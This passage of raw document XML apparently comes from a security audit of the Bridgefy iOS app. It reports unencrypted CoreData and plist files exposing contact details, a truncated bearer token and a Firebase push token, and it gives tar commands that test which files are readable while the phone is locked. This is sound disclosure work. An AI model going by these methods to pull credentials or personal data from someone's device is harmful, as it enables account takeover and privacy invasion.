        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CoreData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following examples show that it is possible to retrieve user PII and authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tokens by observing the contents of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CoreData </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="43"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Support/CoreData.sqlite-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>wal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ZCONTACTMODEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>table,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>inspect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>columns,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>interesting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are presented next:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Contact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>List):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ZDISPLAYNAME:oscaraa, ZID:e16ee31e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>aea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>c2-abdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>d1f3473b01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ZUSERMODEL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>table, inspect the contents of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ZTOKEN </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>column, some interesting values are presented next:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(App</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Token):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Bearer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>eyJhbGciOiJSUzI1NiIsImtpZCI6ImNlOWI4ODBmODE4MmRkYTU1N2Y3YzcwZTIwZTRlMzcwZTNkMTI3NDciLCJ 0eXAiOiJKV1QifQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.eyJuYW1lIjoiKz[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="374"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following example shows that it is possible to retrieve the Firebase device FCM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Preferences/com.bridgefy.BridgefyNewStaging.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Content:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;pushToken&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;eVdbsQFdEEsNhL28PjRIIZ:APA91bHcah[...]&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The extent of this issue is perhaps best illustrated by the output of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>tar </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command, which is able to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>remained</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>passive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>screen for a few minutes. This clearly demonstrates that most files are currently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>unprotected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>rest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="1243" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cvfz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>files_locked.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unprotected_files.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>protected_files.txt wc -l protected_files.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wc -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unprotected_files.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
